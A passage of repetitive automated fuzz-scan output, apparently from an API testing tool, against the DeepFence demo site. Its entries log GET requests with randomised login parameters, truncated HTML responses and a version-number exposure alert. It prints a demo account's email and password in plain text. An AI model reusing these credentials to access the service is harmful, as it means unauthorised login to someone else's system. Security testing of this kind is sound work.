Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioxGqgTR3uCRYNW\nDemoUser1# VaA1vX8nC5s9a\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.Issue Number #30\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioMfOgfphn\nDemoUser1# cw37NhWovs0n8\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #31\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioeI9fbsOvhSbkU\nDemoUser1# TZLakiResponse Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #32\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io7LjZde0BbNTgOVp\nDemoUser1# 447x2MrZkDz\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #33\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioQOJQcWL0z8\nDemoUser1# PvYK5Nj\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #34\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io70uZSnxP\nDemoUser1# WWlXbHPiOQooNh\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #35\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iomQe4TUsT\nDemoUser1# queMN\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #36\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io6cbs3OH50BH\nDemoUser1# ymEJmEAi4NV6\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #37Scan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ionI1btofFrF45g\nDemoUser1# IJZkl\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #38\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioRcLTjDRNt\nDemoUser1# V4DPLGVcVa9t\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #39\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioRuNBPFiVJes0K\nDemoUser1# CgDCyuJ8NGJY\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parametersdemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #40\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioi6wlnBnFVmF\nDemoUser1# pJy101gXm46\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #41\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@\ndeepfence.io0kd8g\nDemoUser1# J5EJw\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the parameters\ndemouser@deepfence.io\nDemoUser1#\nprovoked an unexpected response, you may want to improve error handling in the code \nprocessing this input.\nIssue Number #42\nScan Fuzzing Scan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io8XJQIB2nHYlE\nDemoUser1# 3OqsbeAz9zvS\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points Since random data inserted into the 